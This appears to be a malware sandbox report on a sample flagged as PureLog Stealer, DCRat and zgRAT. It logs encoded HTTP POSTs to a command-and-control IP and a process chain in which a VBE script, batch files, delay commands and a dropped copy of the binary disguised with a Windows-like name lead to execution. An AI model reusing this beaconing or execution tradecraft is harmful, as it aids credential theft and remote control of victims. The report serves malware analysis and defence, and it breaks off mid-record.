                                      Data Ascii: TWTTXT[Q\L}P^Xcrj_uhkUj\`BZBp`IxUo^zkStYp}u~V@{SPN}ri
                                      Jan 3, 2025 18:32:30.071332932 CET | 326 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:29 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      4 | 192.168.2.4 | 49740 | 206.188.197.24 | 80 | 7352 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:32:36.103775024 CET | 408 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                      Host: 206.188.197.24
                                      Content-Length: 336
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:36.452882051 CET | 336 | OUT | Data Raw: 00 01 01 00 03 08 04 07 05 06 02 01 02 05 01 07 00 0a 05 0b 02 03 03 0e 03 0f 0f 50 06 53 01 55 0d 02 04 0c 03 00 04 01 0d 03 07 05 07 01 04 00 07 02 0f 59 0e 05 05 0a 04 57 05 05 04 56 07 08 01 00 0a 0e 05 03 05 00 0c 50 0d 06 0d 0d 0e 01 05 50
                                      Data Ascii: PSUYWVPPPRT\L}U|Ny_c[iu[|@~|[clo_Zlog{se^hSpCtg^N~e~V@zmz~_y
                                      Jan 3, 2025 18:32:36.712089062 CET | 728 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:36 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      5 | 192.168.2.4 | 49741 | 206.188.197.24 | 80 | 7600 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:32:46.817472935 CET | 343 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:47.171789885 CET | 344 | OUT | Data Raw: 00 05 01 02 06 0f 01 01 05 06 02 01 02 07 01 02 00 0b 05 0f 02 0d 03 0c 00 03 0d 54 05 06 06 08 0f 56 06 5c 02 57 04 0a 0f 01 07 0a 06 01 05 01 07 02 0e 0b 0f 07 04 57 04 0e 06 57 06 04 07 5f 01 04 0d 00 07 06 04 02 0f 04 0c 57 0c 01 0c 02 05 53
                                      Data Ascii: TV\WWW_WSQV\L}P|`rwb~Xa\`huLvl`MMh{BUJz`Th}^cdk_}_~V@AxmPba
                                      Jan 3, 2025 18:32:47.421807051 CET | 326 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:47 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      6 | 192.168.2.4 | 49743 | 206.188.197.24 | 80 | 3384 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:32:54.003305912 CET | 343 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:54.359172106 CET | 344 | OUT | Data Raw: 05 01 04 01 06 0c 01 0b 05 06 02 01 02 07 01 01 00 05 05 0a 02 0c 03 0a 02 0e 0d 01 04 07 03 57 0f 52 06 0b 02 06 05 02 0f 0a 07 01 05 06 06 07 05 05 0b 01 0a 02 06 55 01 0e 05 54 05 0b 05 01 01 06 0c 0e 04 05 05 03 0e 00 0f 07 0e 54 0b 04 07 04
                                      Data Ascii: WRUTTUR\L~NXcqmOvft|f_wUthZlJyll^{~hnsU`YRA}_~V@AxSnOry
                                      Jan 3, 2025 18:32:54.635205984 CET | 326 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:54 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      7 | 192.168.2.4 | 49780 | 206.188.197.24 | 80 | 7780 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:33:00.604026079 CET | 343 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:00.952790976 CET | 344 | OUT | Data Raw: 00 0b 04 06 03 0b 04 00 05 06 02 01 02 01 01 00 00 06 05 0d 02 01 03 01 02 0e 0c 0d 04 04 01 04 0a 0e 07 00 07 02 07 00 0c 03 04 53 00 0b 06 04 03 0a 0c 5b 0d 0f 06 57 07 01 06 51 05 00 06 0e 00 06 0c 01 06 05 04 52 0e 03 0f 0e 0f 0c 0c 54 06 06
                                      Data Ascii: S[WQRTT\L~@|pj`bSMb[h@|lScoc\]kXyg{s}^CwRwtc]ju~V@xCb~b[
                                      Jan 3, 2025 18:33:01.233242035 CET | 326 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:01 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      8 | 192.168.2.4 | 49827 | 206.188.197.24 | 80 | 8004 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:33:08.114742041 CET | 355 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:08.468377113 CET | 344 | OUT | Data Raw: 05 01 01 02 06 08 01 04 05 06 02 01 02 06 01 03 00 06 05 09 02 0d 03 0b 07 01 0f 57 03 03 01 08 0d 55 04 59 03 04 07 03 0e 05 05 54 05 0a 07 02 03 03 0f 01 0c 07 04 0b 06 00 03 03 06 05 04 0c 02 50 0f 0e 00 0f 05 01 0d 0e 0b 00 0f 57 0e 07 02 06
                                      Data Ascii: WUYTPW\R\L}RhNPwryvKxO|SLcolM|cp{lgzca^CZtIZAiO~V@Bx}bNb}
                                      Jan 3, 2025 18:33:08.718519926 CET | 326 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:08 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      9 | 192.168.2.4 | 49868 | 206.188.197.24 | 80 | 7056 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:33:14.906615973 CET | 355 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:15.265352011 CET | 344 | OUT | Data Raw: 00 06 04 00 06 0f 04 02 05 06 02 01 02 00 01 00 00 06 05 0a 02 00 03 0c 03 06 0f 07 07 0f 02 06 0a 06 05 08 02 56 04 02 0d 0b 06 04 00 0b 05 51 05 05 0c 0c 0f 02 05 52 05 05 03 03 01 02 07 0e 00 01 0c 59 00 01 04 08 0d 00 0d 03 0e 04 0d 01 05 0c
                                      Data Ascii: VQRYPUUW\L~A~pi[`\z]aeUS|bYwltMhctx|HoszI|C{Tct`}e~V@xCbO~ra
                                      Jan 3, 2025 18:33:15.516916990 CET | 326 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:15 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      10 | 192.168.2.4 | 49907 | 206.188.197.24 | 80 | 1608 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:33:21.477498055 CET | 355 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:21.827806950 CET | 344 | OUT | Data Raw: 00 04 04 03 06 0b 01 06 05 06 02 01 02 00 01 04 00 0b 05 0c 02 04 03 0d 01 02 0e 05 05 01 02 07 0a 02 06 0e 03 04 05 01 0d 00 05 0b 04 07 05 51 06 50 0f 0e 0e 57 04 0a 05 04 04 07 01 02 07 5b 03 53 0c 0c 05 06 01 07 0e 55 0c 50 0d 06 0f 01 05 50
                                      Data Ascii: QPW[SUPPYR\L~|ceZcqiMa[xklTXtpO|shKxlQlNW^hmlCwo^ie~V@{CP}re
                                      Jan 3, 2025 18:33:22.107248068 CET | 326 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:22 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      11 | 192.168.2.4 | 49945 | 206.188.197.24 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:33:28.024909019 CET | 408 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:28.376456022 CET | 344 | OUT | Data Raw: 00 06 04 01 03 0a 01 03 05 06 02 01 02 0d 01 0b 00 00 05 0a 02 01 03 00 02 04 0f 0d 04 57 02 07 0e 01 03 00 01 01 03 03 0b 05 02 07 06 01 04 04 05 03 0d 0f 0a 07 04 52 06 54 04 0d 05 07 06 08 05 06 0e 0f 06 0f 06 55 0e 01 0c 04 0e 03 0e 08 05 07
                                      Data Ascii: WRTU[RQS\L}TYjM`bz_beoSkliMvloYhMQ_ooxZxsvSlc^s_i_~V@z}zO~bW
                                      Jan 3, 2025 18:33:28.662826061 CET | 728 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:28 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      12 | 192.168.2.4 | 50010 | 206.188.197.24 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:33:38.354664087 CET | 408 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:38.702672005 CET | 344 | OUT | Data Raw: 00 03 01 05 03 0a 01 0b 05 06 02 01 02 06 01 02 00 06 05 09 02 03 03 00 01 06 0e 0d 03 03 00 07 0d 51 06 5b 03 54 06 06 0b 0a 07 06 04 04 02 02 06 01 0c 5b 0a 02 05 01 07 00 07 06 05 01 05 0f 00 01 0d 01 07 51 06 04 0f 0e 0c 07 0f 51 0d 07 06 54
                                      Data Ascii: Q[T[QQTQV\L}UYfwaj^wftOhB}tls]p|{lNTkm`@vtpi_~V@BxmbN~LW
                                      Jan 3, 2025 18:33:38.977977037 CET | 728 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:38 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      13 | 192.168.2.4 | 50015 | 206.188.197.24 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:33:44.531418085 CET | 408 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:44.890126944 CET | 344 | OUT | Data: request body
                                      Jan 3, 2025 18:33:45.163882971 CET | 728 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:45 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      14 | 192.168.2.4 | 50016 | 206.188.197.24 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:33:55.132246017 CET | 408 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:55.483731985 CET | 344 | OUT | Data: request body
                                      Jan 3, 2025 18:33:55.746716022 CET | 728 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:55 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->


                                      Target ID:0
                                      Start time:12:31:54
                                      Start date:03/01/2025
                                      Path:C:\Users\user\Desktop\7vP2IvNXqx.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\7vP2IvNXqx.exe"
                                      Imagebase:0x2d0000
                                      File size:1'978'248 bytes
                                      MD5 hash:1A3A764C4B4974435DBA8926E7137766
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1650555620.00000000078DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:12:31:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe"
                                      Imagebase:0x870000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:12:31:56
                                      Start date:03/01/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:12:31:56
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:12:31:56
                                      Start date:03/01/2025
                                      Path:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\msProviderbrowserrefdll/winIntorefruntimebroker.exe"
                                      Imagebase:0xff0000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1675544787.0000000000FF2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 78%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:5
                                      Start time:12:31:58
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:12:31:58
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:12:31:58
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:12:31:58
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:9
                                      Start time:12:32:03
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x3b0000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1759792480.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 78%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:10
                                      Start time:12:32:05
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:12:32:05
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:12:32:05
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:12:32:05
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff7ee8d0000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:12:32:14
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
